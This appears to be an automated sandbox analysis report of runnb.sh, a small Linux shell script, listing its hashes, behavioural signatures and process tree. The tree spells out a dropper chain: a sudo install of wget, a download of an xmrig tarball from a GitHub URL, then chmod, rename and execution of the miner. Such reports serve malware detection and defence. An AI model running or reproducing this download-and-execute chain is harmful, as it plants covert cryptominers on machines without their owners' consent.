Analysis
- max time kernel: 47s
- max time network: 50s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 30/10/2024, 13:11
Tasks
- Static task static1
- Behavioral task behavioral1: sample runnb.sh, resource ubuntu1804-amd64-20240611-en
- Behavioral task behavioral2: sample runnb.sh, resource debian9-armhf-20240611-en
- Behavioral task behavioral3: sample runnb.sh, resource debian9-mipsbe-20240611-en
- Behavioral task behavioral4: sample runnb.sh, resource debian9-mipsel-20240611-en
General
- Target: runnb.sh
- Size: 213B
- MD5: a1189543e2f98f6696c6d857b899ab0a
- SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
- SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
- SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  PID 763: chmod
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTPs, 1 IoCs)
  Abuse sudo or cached sudo credentials to execute code.
  PID 704: sudo
- Reads CPU attributes (1 TTPs, 2 IoCs)
  File opened for reading /sys/devices/system/cpu/online (exim4)
  File opened for reading /sys/devices/system/cpu/online (exim4)
- Reads runtime system information (14 IoCs)
  File opened for reading /proc/sys/kernel/ngroups_max (sendmail)
  File opened for reading /proc/self/fd (apt)
  File opened for reading /proc/filesystems (sudo)
  File opened for reading /proc/self/stat (sudo)
  File opened for reading /proc/self/fd (sudo)
  File opened for reading /proc/self/fd (apt)
  File opened for reading /proc/filesystems (dpkg)
  File opened for reading /proc/filesystems (dpkg)
  File opened for reading /proc/filesystems (mv)
  File opened for reading /proc/sys/kernel/ngroups_max (sendmail)
  File opened for reading /proc/filesystems (dpkg)
  File opened for reading /proc/filesystems (dpkg)
  File opened for reading /proc/filesystems (tar)
  File opened for reading /proc/sys/kernel/ngroups_max (sudo)
- Writes file to tmp directory (8 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification /tmp/fileutl.message.rI7jbi (apt)
  File opened for modification /tmp/fileutl.message.dXYb6i (apt)
  File opened for modification /tmp/fileutl.message.jERPhv (apt)
  File opened for modification /tmp/fileutl.message.x7IX4P (apt)
  File opened for modification /tmp/fileutl.message.Xq4tlU (apt)
  File opened for modification /tmp/fileutl.message.FgDUuY (apt)
  File opened for modification /tmp/fileutl.message.VTey0i (apt)
  File opened for modification /tmp/fileutl.message.vXs1CJ (apt)
Processes (indentation shows parent/child; matched signatures in brackets)
- /tmp/runnb.sh: /tmp/runnb.sh (PID 701)
  - /usr/bin/sudo: sudo apt install wget (PID 704) [Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Reads runtime system information]
    - /usr/sbin/sendmail: sendmail -t (PID 716) [Reads runtime system information]
      - /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t67YZ-0000BY-Ui (PID 730) [Reads CPU attributes]
    - /usr/sbin/sendmail: sendmail -t (PID 719) [Reads runtime system information]
      - /usr/sbin/exim4: /usr/sbin/exim4 -Mc 1t67YZ-0000Bb-Ut (PID 731) [Reads CPU attributes]
    - /usr/bin/apt: apt install wget (PID 722) [Reads runtime system information; Writes file to tmp directory]
      - /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures (PID 729) [Reads runtime system information]
      - /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures (PID 736) [Reads runtime system information]
  - /usr/bin/apt: apt install wget (PID 755) [Reads runtime system information; Writes file to tmp directory]
    - /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures (PID 756) [Reads runtime system information]
    - /usr/bin/dpkg: /usr/bin/dpkg --print-foreign-architectures (PID 757) [Reads runtime system information]
  - /usr/bin/wget: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz (PID 761)
  - /bin/tar: tar xvf xmrigtar.tar.gz (PID 762) [Reads runtime system information]
  - /bin/chmod: chmod +x xmrig (PID 763) [File and Directory Permissions Modification]
  - /bin/mv: mv xmrig cool (PID 764) [Reads runtime system information]
  - /tmp/cool: ./cool (PID 765)
-
Network
MITRE ATT&CK Enterprise v15
Downloads